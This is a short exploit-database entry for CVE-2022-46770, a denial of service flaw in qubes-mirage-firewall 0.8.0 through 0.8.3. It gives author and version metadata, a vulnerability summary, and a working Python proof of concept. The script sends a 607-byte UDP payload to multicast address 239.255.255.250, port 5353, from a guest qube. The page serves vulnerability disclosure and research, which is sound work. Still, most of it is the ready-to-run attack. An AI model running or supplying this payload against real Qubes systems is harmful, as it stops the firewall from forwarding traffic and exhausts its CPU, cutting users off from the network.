Headline
Qubes Mirage Firewall 0.8.3 Denial Of Service
Qubes Mirage Firewall versions 0.8.0 through 0.8.3 suffer from a denial of service vulnerability.
# Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)# Date: 2022-12-04# Exploit Author: Krzysztof Burghardt <krzysztof@burghardt.pl># Vendor Homepage: https://mirage.io/blog/MSA03# Software Link: https://github.com/mirage/qubes-mirage-firewall/releases# Version: >= 0.8.0 & < 0.8.4# Tested on: Qubes OS# CVE: CVE-2022-46770#PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166#!/usr/bin/env python3from socket import socket, AF_INET, SOCK_DGRAMTARGET = "239.255.255.250"PORT = 5353PAYLOAD = b'a' * 607s = socket(AF_INET, SOCK_DGRAM)s.sendto(PAYLOAD, (TARGET, PORT))Related news
CVE-2022-46770: Mirage v0.8.x DoS from untrusted Qube by sending arbitrary UDP payload · Issue #166 · mirage/qubes-mirage-firewall
qubes-mirage-firewall (aka Mirage firewall for QubesOS) 0.8.x through 0.8.3 allows guest OS users to cause a denial of service (CPU consumption and loss of forwarding) via a crafted multicast UDP packet (IP address range of 224.0.0.0 through 239.255.255.255).